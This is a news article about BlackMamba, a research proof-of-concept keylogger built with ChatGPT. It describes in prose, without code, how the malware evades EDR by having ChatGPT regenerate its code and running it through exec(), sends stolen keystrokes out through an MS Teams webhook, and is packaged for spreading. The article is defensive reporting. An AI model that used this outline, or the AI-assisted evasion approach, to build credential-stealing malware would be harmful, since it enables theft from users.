Published on: March 17, 2023
A cybersecurity expert has developed a new form of malware called Blackmamba, which can bypass endpoint detection and response (EDR) filters. Jeff Sims, a researcher at the HYAS Institute, created the polymorphic keylogger using ChatGPT, which modifies the malware randomly based on user input.
Sims took advantage of ChatGPT’s language capabilities to produce the keylogger in Python 3. By executing the python exec() function, he was able to create a unique Python script every time the AI tool was called, making the malware polymorphic and difficult to detect by EDRs.
Communications tools like Slack and MS Teams are attractive targets for cybercriminals as they provide access to an organization’s internal resources and are interconnected with many other essential tools.
According to a HYAS report, “BlackMamba can collect sensitive information, such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into their device. Once this data is captured, the malware uses MS Teams webhook to send the collected data to the malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.”
To make the malware more portable and shareable, Sims talks about using a free, open-source utility called auto-py-to-exe, which converts Python code into .exe files that can run on different devices, including Windows, Mac OS, and Linux systems. The malware can then be easily shared within the target environment using email or social engineering schemes.
As ChatGPT’s machine learning capabilities advance, cybersecurity threats will become more sophisticated and difficult to detect. While automated security controls are essential, they are not foolproof, and cybercriminals can evade detection using advanced techniques.
It is therefore crucial for organizations to remain proactive in their cybersecurity strategies to protect against emerging threats. By staying vigilant and keeping up with cutting-edge research, organizations can stay ahead of threat actors and safeguard their systems against potential attacks.